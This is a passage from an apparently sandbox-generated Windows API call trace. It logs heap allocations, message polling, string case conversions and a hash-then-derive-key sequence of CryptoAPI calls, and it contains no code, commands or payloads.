lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.515] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.515] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.515] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fc0 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.516] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.516] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.516] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.516] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.516] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x2415a48 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x249bb10 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.516] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.516] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.517] CryptCreateHash (in: hProv=0xad2be8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8bef50 | out: phHash=0x8bef50) returned 1 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20d0 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.517] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.517] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2060 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.518] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466d90 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0e0 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.518] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.519] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2080 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20c0 [0261.519] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466d90 [0261.519] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.520] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.520] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.520] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.520] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.520] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.520] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.520] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2070 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20a0 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acc60 [0261.521] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a20a0 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0b0 [0261.521] CryptHashData (hHash=0xaa5920, pbData=0x34a2080, dwDataLen=0x3, dwFlags=0x1) returned 1 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2130 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0261.521] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2120 [0261.521] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0261.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.524] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20d0 [0261.524] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20c0 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.525] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0261.525] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.525] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0261.525] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.525] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ab310 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa950 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.525] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0261.525] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0261.526] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.526] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0261.526] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.526] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a20b0 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f30 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e88 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2100 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9cc0 [0261.526] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0261.526] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.526] CryptDeriveKey (in: hProv=0xad2be8, Algid=0x6601, hBaseData=0xaa5920, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa59a0) returned 1 [0261.526] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d20 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9288 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f18 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2140 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0261.527] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2100 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20f0 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20e0 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2070 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acc60 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20c0 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c48 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa950 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f30 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0261.528] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20d0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9fc0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2120 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f170 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0261.529] HeapFree (in: 